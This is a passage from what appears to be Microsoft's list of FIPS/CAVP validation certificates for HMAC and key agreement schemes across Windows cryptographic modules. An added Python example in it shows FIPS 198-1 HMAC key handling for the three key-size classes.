Prerequisite: SHS #4011
Implementation: Microsoft Surface Hub SymCrypt Cryptographic Implementations #3269
Version: 10.0.15063.674

HMAC-SHA-1:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-256:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-384:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-512:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
Prerequisite: SHS #4010
Implementation: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #3268
Version: 10.0.15254

HMAC-SHA-1:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-256:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-384:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-512:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
Prerequisite: SHS #4009
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #3267
Version: 10.0.16299

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val#3790
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val#3790
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val#3790
Implementation: Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #3062
Version: 10.0.15063

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val#3790
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val#3790
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val#3790
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val#3790
Implementation: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #3061
Version: 10.0.15063

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val#3652
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val#3652
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val#3652
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val#3652
Implementation: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2946
Version: 7.00.2872

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val#3651
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val#3651
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val#3651
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val#3651
Implementation: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2945
Version: 8.00.6246

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val# 3649
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val# 3649
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val# 3649
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val# 3649
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2943
Version: 7.00.2872

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val#3648
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val#3648
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val#3648
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val#3648
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2942
Version: 8.00.6246

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val# 3347
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val# 3347
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val# 3347
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #2661
Version: 10.0.14393

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val# 3347
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val# 3347
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val# 3347
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val# 3347
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update SymCrypt Cryptographic Implementations #2651
Version: 10.0.14393

HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) SHS Val# 3047
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val# 3047
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val# 3047
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val# 3047
Implementation: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” SymCrypt Cryptographic Implementations #2381
Version: 10.0.10586

HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Microsoft Windows 10, Microsoft Surface Pro 3 with
SHSVal# 2886 Windows 10, Microsoft Surface 3 with Windows 10,
Microsoft Surface Pro 2 with Windows 10, Microsoft
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Surface Pro with Windows 10 SymCrypt Cryptographic
SHSVal# 2886 Implementations #2233
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) Version 10.0.10240
SHSVal# 2886
HMAC-SHA512 ( Key Size Ranges Tested: KSBS )
SHSVal# 2886

HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Storage Server 2012 R2, Microsoft Windows RT
SHS Val#2373 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
Surface Pro with Windows 8.1, Microsoft Surface 2,
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
SHS Val#2373 Windows Phone 8.1, Microsoft Windows Embedded 8.1
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) Industry and Microsoft StorSimple 8100 SymCrypt
SHS Val#2373 Cryptographic Implementations #1773
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) Version 6.3.9600
SHS Val#2373

HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows CE and Windows Mobile, and Windows
Val#2764 Embedded Handheld Enhanced Cryptographic Provider
(RSAENH) #2122
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS
Val#2764 Version 5.2.29344
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS
Val#2764
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS
Val#2764

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256 (Key Size Ranges Tested: KS) SHS #1902
Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 BitLocker® Cryptographic Implementations #1347

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS #1902
Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Enhanced Cryptographic Provider (RSAENH) #1346

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS #1903
Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Next Generation Symmetric Cryptographic Algorithms Implementations (SYMCRYPT) #1345

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#1773
Algorithm Implementation and Certificate #: Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #1364

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#1774
Algorithm Implementation and Certificate #: Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #1227

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#1081
Algorithm Implementation and Certificate #: Windows Server 2008 R2 and SP1 CNG algorithms #686; Windows 7 and SP1 CNG algorithms #677; Windows Server 2008 R2 Enhanced Cryptographic Provider (RSAENH) #687; Windows 7 Enhanced Cryptographic Provider (RSAENH) #673

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256 (Key Size Ranges Tested: KS) SHS Val#1081
Algorithm Implementation and Certificate #: Windows 7 and SP1 and Windows Server 2008 R2 and SP1 BitLocker Algorithm Implementations #675

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#816
Algorithm Implementation and Certificate #: Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #452

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256 (Key Size Ranges Tested: KS) SHS Val#753
Algorithm Implementation and Certificate #: Windows Vista Ultimate SP1 and Windows Server 2008 BitLocker Algorithm Implementations #415

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#753
Algorithm Implementation and Certificate #: Windows Server 2008 Enhanced Cryptographic Provider (RSAENH) #408; Windows Vista Enhanced Cryptographic Provider (RSAENH) #407

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#618
Algorithm Implementation and Certificate #: Windows Vista Enhanced Cryptographic Provider (RSAENH) #297

Modes / States / Key Sizes: HMAC-SHA1 (Key Size Ranges Tested: KSBS) SHS Val#785
Algorithm Implementation and Certificate #: Windows XP Professional SP3 Kernel Mode Cryptographic Module (fips.sys) #429; Windows XP, vendor-affirmed

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#783
Algorithm Implementation and Certificate #: Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #428

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#613
Algorithm Implementation and Certificate #: Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #289

Modes / States / Key Sizes: HMAC-SHA1 (Key Size Ranges Tested: KSBS) SHS Val#610
Algorithm Implementation and Certificate #: Windows Server 2003 SP2 Kernel Mode Cryptographic Module (fips.sys) #287

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#753
Algorithm Implementation and Certificate #: Windows Server 2008 CNG algorithms #413; Windows Vista Ultimate SP1 CNG algorithms #412

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256 (Key Size Ranges Tested: KS) SHS Val#737
Algorithm Implementation and Certificate #: Windows Vista Ultimate BitLocker Drive Encryption #386

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#618
Algorithm Implementation and Certificate #: Windows Vista CNG algorithms #298

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#589
Algorithm Implementation and Certificate #: Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile Enhanced Cryptographic Provider (RSAENH) #267

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#578
Algorithm Implementation and Certificate #: Windows CE and Windows Mobile 6.0 and Windows Mobile 6.5 Enhanced Cryptographic Provider (RSAENH) #260

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256 (Key Size Ranges Tested: KS) SHS Val#495
Algorithm Implementation and Certificate #: Windows Vista BitLocker Drive Encryption #199

Modes / States / Key Sizes: HMAC-SHA1 (Key Size Ranges Tested: KSBS) SHS Val#364
Algorithm Implementation and Certificate #: Windows Server 2003 SP1 Enhanced Cryptographic Provider (RSAENH) #99; Windows XP, vendor-affirmed

Modes / States / Key Sizes: HMAC-SHA1, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512 (Key Size Ranges Tested: KSBS) SHS Val#305
Algorithm Implementation and Certificate #: Windows CE 5.00 and Windows CE 5.01 Enhanced Cryptographic Provider (RSAENH) #31
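The three key-size classes that each HMAC certificate above lists (KS &lt; BS, KS = BS and KS &gt; BS: a key shorter than, equal to, or longer than the hash block size) are tested separately because FIPS 198-1 treats them differently: a key longer than the block size is first replaced by its hash, and a shorter key is zero-padded up to the block size. The following Python script is an added example written for this page, not code from any of the listed Microsoft modules. It implements HMAC step by step from the standard library's hashlib, classifies a key into one of the three CAVP classes, and checks against hmac.new that the "equivalent" keys those two preprocessing steps create really produce the same tag. All keys and messages in it are constructed sample values.

```python
"""FIPS 198-1 HMAC key handling: why CAVP tests KS < BS, KS = BS and KS > BS.

Added example for this page (not Microsoft code). Standard library only; the
keys and messages below are constructed samples.
"""
import hashlib
import hmac


def hmac_fips198(key: bytes, msg: bytes, hash_name: str = "sha256") -> bytes:
    """HMAC per FIPS 198-1 / RFC 2104, written out step by step.

    Step 1: a key longer than the hash block size B is replaced by H(key).
    Step 2: the (possibly hashed) key is zero-padded on the right to B bytes.
    Step 3: HMAC = H((K0 xor opad) || H((K0 xor ipad) || msg)).
    """
    block_size = hashlib.new(hash_name).block_size  # 64 for SHA-1/256, 128 for SHA-384/512
    if len(key) > block_size:                        # KS > BS: hash the key first
        key = hashlib.new(hash_name, key).digest()
    k0 = key.ljust(block_size, b"\x00")              # KS < BS: zero-pad; KS = BS: unchanged
    ipad = bytes(b ^ 0x36 for b in k0)
    opad = bytes(b ^ 0x5C for b in k0)
    inner = hashlib.new(hash_name, ipad + msg).digest()
    return hashlib.new(hash_name, opad + inner).digest()


def key_size_class(key: bytes, hash_name: str = "sha256") -> str:
    """Return the CAVP key-size class of `key`: 'KS<BS', 'KS=BS' or 'KS>BS'."""
    bs = hashlib.new(hash_name).block_size
    if len(key) < bs:
        return "KS<BS"
    return "KS=BS" if len(key) == bs else "KS>BS"


def equivalent_key(key: bytes, hash_name: str = "sha256") -> bytes:
    """A different-looking key that FIPS 198-1 maps to the same K0 as `key`.

    For KS > BS that is H(key); for KS < BS it is key || 0x00...; for KS = BS
    the key is already K0, so it is returned unchanged.
    """
    bs = hashlib.new(hash_name).block_size
    if len(key) > bs:
        return hashlib.new(hash_name, key).digest()
    return key.ljust(bs, b"\x00")


def check_all_classes(hash_name: str = "sha256") -> dict:
    """Exercise the three classes; True means our HMAC, the stdlib HMAC and the
    HMAC under the equivalent key all agree for that class."""
    bs = hashlib.new(hash_name).block_size
    msg = b"constructed sample message"
    keys = {
        "KS<BS": b"\x0b" * 20,
        "KS=BS": bytes(range(bs)),
        "KS>BS": b"\xaa" * (bs + 17),
    }
    results = {}
    for expected_class, key in keys.items():
        tag = hmac_fips198(key, msg, hash_name)
        same_as_stdlib = hmac.compare_digest(tag, hmac.new(key, msg, hash_name).digest())
        same_under_equiv = hmac.compare_digest(
            tag, hmac.new(equivalent_key(key, hash_name), msg, hash_name).digest()
        )
        results[expected_class] = (
            key_size_class(key, hash_name) == expected_class
            and same_as_stdlib
            and same_under_equiv
        )
    return results


if __name__ == "__main__":
    for name in ("sha1", "sha256", "sha384", "sha512"):
        print(name, check_all_classes(name))
```

The caveat the check makes visible: because a short key is zero-padded, K and K || 0x00 are the same HMAC key, and because a long key is hashed, K and H(K) are the same key. Key-management code must not treat keys that differ only in trailing zero bytes as distinct, and a KS &gt; BS key gives no more than hash-output-length security.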

Key Agreement Scheme (KAS)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

Modes / States / Key Sizes:
  KAS ECC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Full Public Key Validation, Key Pair Generation, Public Key Regeneration
    Schemes: Full Unified (Key Agreement Roles: Initiator, Responder; KDFs: Concatenation)
    Parameter Sets: EC (Curve: P-256, SHA: SHA-256, MAC: HMAC); ED (Curve: P-384, SHA: SHA-384, MAC: HMAC)
    Prerequisite: SHS #4011, ECDSA #1253, DRBG #1734
Algorithm Implementation and Certificate #: Microsoft Surface Hub Virtual TPM Implementations #150, Version 10.0.15063.674

Modes / States / Key Sizes:
  KAS ECC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Full Public Key Validation, Key Pair Generation, Public Key Regeneration
    Schemes: Full Unified (Key Agreement Roles: Initiator, Responder; KDFs: Concatenation)
    Parameter Sets: EC (Curve: P-256, SHA: SHA-256, MAC: HMAC); ED (Curve: P-384, SHA: SHA-384, MAC: HMAC)
    Prerequisite: SHS #4009, ECDSA #1252, DRBG #1733
Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #149, Version 10.0.16299

Modes / States / Key Sizes:
  KAS ECC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation, Public Key Regeneration
    Schemes: Ephemeral Unified (Key Agreement Roles: Initiator, Responder; KDFs: Concatenation); One Pass DH (Key Agreement Roles: Initiator, Responder); Static Unified (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): EC (Curve: P-256, SHA: SHA-256, MAC: HMAC); ED (Curve: P-384, SHA: SHA-384, MAC: HMAC); EE (Curve: P-521, SHA: SHA-512, MAC: HMAC)
    Prerequisite: SHS #4011, ECDSA #1250, DRBG #1732
  KAS FFC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation
    Schemes: dhEphem, dhOneFlow, dhStatic (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): FB (SHA: SHA-256, MAC: HMAC); FC (SHA: SHA-256, MAC: HMAC)
    Prerequisite: SHS #4011, DSA #1303, DRBG #1732
Algorithm Implementation and Certificate #: Microsoft Surface Hub SymCrypt Cryptographic Implementations #148, Version 10.0.15063.674

Modes / States / Key Sizes:
  KAS ECC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation, Public Key Regeneration
    Schemes: Ephemeral Unified (Key Agreement Roles: Initiator, Responder; KDFs: Concatenation); One Pass DH (Key Agreement Roles: Initiator, Responder); Static Unified (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): EC (Curve: P-256, SHA: SHA-256, MAC: HMAC); ED (Curve: P-384, SHA: SHA-384, MAC: HMAC); EE (Curve: P-521, SHA: SHA-512, MAC: HMAC)
    Prerequisite: SHS #4010, ECDSA #1249, DRBG #1731
  KAS FFC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation
    Schemes: dhEphem, dhOneFlow, dhStatic (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): FB (SHA: SHA-256, MAC: HMAC); FC (SHA: SHA-256, MAC: HMAC)
    Prerequisite: SHS #4010, DSA #1302, DRBG #1731
Algorithm Implementation and Certificate #: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #147, Version 10.0.15254

Modes / States / Key Sizes:
  KAS ECC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation, Public Key Regeneration
    Schemes: Ephemeral Unified (Key Agreement Roles: Initiator, Responder; KDFs: Concatenation); One Pass DH (Key Agreement Roles: Initiator, Responder); Static Unified (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): EC (Curve: P-256, SHA: SHA-256, MAC: HMAC); ED (Curve: P-384, SHA: SHA-384, MAC: HMAC); EE (Curve: P-521, SHA: SHA-512, MAC: HMAC)
    Prerequisite: SHS #4009, ECDSA #1246, DRBG #1730
  KAS FFC:
    Functions: Domain Parameter Generation, Domain Parameter Validation, Key Pair Generation, Partial Public Key Validation
    Schemes: dhEphem, dhOneFlow, dhStatic (Key Agreement Roles: Initiator, Responder)
    Parameter Sets (each scheme): FB (SHA: SHA-256, MAC: HMAC); FC (SHA: SHA-256, MAC: HMAC)
    Prerequisite: SHS #4009, DSA #1301, DRBG #1730
Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #146, Version 10.0.16299

Modes / States / Key Sizes:
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Full Validation Key Regeneration) SCHEMES [ FullUnified ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ]
  SHS Val#3790, DSA Val#1135, DRBG Val#1556
Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #128, Version 10.0.15063

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#3790, DSA Val#1223, DRBG Val#1555
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#3790, ECDSA Val#1133, DRBG Val#1555
Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #127, Version 10.0.15063
Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#3649, DSA Val#1188, DRBG Val#1430
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
Algorithm Implementation and Certificate #: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #115, Version 7.00.2872

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhHybridOneFlow ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#3648, DSA Val#1187, DRBG Val#1429
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#3648, ECDSA Val#1072, DRBG Val#1429
Algorithm Implementation and Certificate #: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #114, Version 8.00.6246
Modes / States / Key Sizes:
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Full Validation Key Regeneration) SCHEMES [ FullUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; &lt; KDF: CONCAT &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ]
  SHS Val#3347, ECDSA Val#920, DRBG Val#1222
Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #93, Version 10.0.14393

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#3347, DSA Val#1098, DRBG Val#1217
  ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation Key Regeneration) SCHEMES [ EphemeralUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ OnePassDH ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ] [ StaticUnified ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
  SHS Val#3347, DSA Val#1098, ECDSA Val#911, DRBG Val#1217, HMAC Val#2651
Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update Cryptography Next Generation (CNG) Implementations #92, Version 10.0.14393

Modes / States / Key Sizes:
  FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG DPV KPG Partial Validation) SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC &lt; KARole(s): Initiator / Responder &gt; ) ( FB: SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
  SHS Val#3047, DSA Val#1024, DRBG Val#955
